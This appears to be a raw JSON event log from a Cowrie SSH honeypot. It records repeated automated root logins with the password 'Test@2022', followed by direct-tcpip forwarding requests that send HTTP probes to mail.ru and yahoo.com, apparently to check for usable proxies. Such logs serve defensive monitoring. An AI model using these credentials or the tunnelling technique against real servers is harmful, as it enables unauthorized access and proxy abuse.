{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:25.122689Z","src_ip":"77.83.207.83","session":"8ccc8234c471"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":10200,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:10200","sensor":"my-vps","timestamp":"2025-08-31T03:52:25.174129Z","session":"8ccc8234c471"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:25.224554Z","src_ip":"77.83.207.83","session":"8ccc8234c471"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":10915,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:10915","sensor":"my-vps","timestamp":"2025-08-31T03:52:25.368724Z","session":"8ccc8234c471"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:25.419261Z","src_ip":"77.83.207.83","session":"8ccc8234c471"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":17891,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:17891","sensor":"my-vps","timestamp":"2025-08-31T03:52:25.560693Z","session":"8ccc8234c471"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:25.610982Z","src_ip":"77.83.207.83","session":"8ccc8234c471"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:25.661938Z","src_ip":"77.83.207.83","session":"8ccc8234c471"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":33686,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1484e2a3ba2","protocol":"ssh","message":"New connection: 77.83.207.83:33686 (1.2.3.4:22) [session: c1484e2a3ba2]","sensor":"my-vps","timestamp":"2025-08-31T03:52:25.711078Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:25.720912Z","src_ip":"77.83.207.83","session":"c1484e2a3ba2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:25.761776Z","src_ip":"77.83.207.83","session":"c1484e2a3ba2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:26.013237Z","src_ip":"77.83.207.83","session":"c1484e2a3ba2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":10924,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:10924","sensor":"my-vps","timestamp":"2025-08-31T03:52:26.064466Z","session":"c1484e2a3ba2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:26.115195Z","src_ip":"77.83.207.83","session":"c1484e2a3ba2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":25134,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:25134","sensor":"my-vps","timestamp":"2025-08-31T03:52:26.256757Z","session":"c1484e2a3ba2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:26.307294Z","src_ip":"77.83.207.83","session":"c1484e2a3ba2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":10788,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:10788","sensor":"my-vps","timestamp":"2025-08-31T03:52:26.448700Z","session":"c1484e2a3ba2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:26.499224Z","src_ip":"77.83.207.83","session":"c1484e2a3ba2"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:26.550478Z","src_ip":"77.83.207.83","session":"c1484e2a3ba2"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":33770,"dst_ip":"1.2.3.4","dst_port":22,"session":"8fd8052f8789","protocol":"ssh","message":"New connection: 77.83.207.83:33770 (1.2.3.4:22) [session: 8fd8052f8789]","sensor":"my-vps","timestamp":"2025-08-31T03:52:26.599628Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:26.600282Z","src_ip":"77.83.207.83","session":"8fd8052f8789"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:26.651122Z","src_ip":"77.83.207.83","session":"8fd8052f8789"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:26.901969Z","src_ip":"77.83.207.83","session":"8fd8052f8789"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":4569,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:4569","sensor":"my-vps","timestamp":"2025-08-31T03:52:26.953603Z","session":"8fd8052f8789"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:27.004311Z","src_ip":"77.83.207.83","session":"8fd8052f8789"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":17475,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:17475","sensor":"my-vps","timestamp":"2025-08-31T03:52:27.148711Z","session":"8fd8052f8789"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:27.200039Z","src_ip":"77.83.207.83","session":"8fd8052f8789"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":4099,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:4099","sensor":"my-vps","timestamp":"2025-08-31T03:52:27.344565Z","session":"8fd8052f8789"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:27.394885Z","src_ip":"77.83.207.83","session":"8fd8052f8789"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:27.446586Z","src_ip":"77.83.207.83","session":"8fd8052f8789"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":33878,"dst_ip":"1.2.3.4","dst_port":22,"session":"03ffb2ab4853","protocol":"ssh","message":"New connection: 77.83.207.83:33878 (1.2.3.4:22) [session: 03ffb2ab4853]","sensor":"my-vps","timestamp":"2025-08-31T03:52:27.495965Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:27.496786Z","src_ip":"77.83.207.83","session":"03ffb2ab4853"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:27.547305Z","src_ip":"77.83.207.83","session":"03ffb2ab4853"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:27.799552Z","src_ip":"77.83.207.83","session":"03ffb2ab4853"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":1093,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:1093","sensor":"my-vps","timestamp":"2025-08-31T03:52:27.851098Z","session":"03ffb2ab4853"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:27.901551Z","src_ip":"77.83.207.83","session":"03ffb2ab4853"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:52:27.928204Z","src_ip":"212.227.235.229","session":"41c11ad8db47"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:52:27.929098Z","src_ip":"212.227.235.229","session":"41c11ad8db47"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":29152,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:29152","sensor":"my-vps","timestamp":"2025-08-31T03:52:28.045020Z","session":"03ffb2ab4853"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:28.095515Z","src_ip":"77.83.207.83","session":"03ffb2ab4853"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":23068,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:23068","sensor":"my-vps","timestamp":"2025-08-31T03:52:28.236735Z","session":"03ffb2ab4853"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:28.287719Z","src_ip":"77.83.207.83","session":"03ffb2ab4853"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:28.339213Z","src_ip":"77.83.207.83","session":"03ffb2ab4853"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":33990,"dst_ip":"1.2.3.4","dst_port":22,"session":"520d2244496f","protocol":"ssh","message":"New connection: 77.83.207.83:33990 (1.2.3.4:22) [session: 520d2244496f]","sensor":"my-vps","timestamp":"2025-08-31T03:52:28.388108Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:28.398041Z","src_ip":"77.83.207.83","session":"520d2244496f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:28.438486Z","src_ip":"77.83.207.83","session":"520d2244496f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:28.688344Z","src_ip":"77.83.207.83","session":"520d2244496f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":24843,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:24843","sensor":"my-vps","timestamp":"2025-08-31T03:52:28.739265Z","session":"520d2244496f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:28.790178Z","src_ip":"77.83.207.83","session":"520d2244496f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":18274,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:18274","sensor":"my-vps","timestamp":"2025-08-31T03:52:28.932498Z","session":"520d2244496f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:28.982642Z","src_ip":"77.83.207.83","session":"520d2244496f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":20510,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:20510","sensor":"my-vps","timestamp":"2025-08-31T03:52:29.124449Z","session":"520d2244496f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:29.174800Z","src_ip":"77.83.207.83","session":"520d2244496f"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:29.225606Z","src_ip":"77.83.207.83","session":"520d2244496f"}
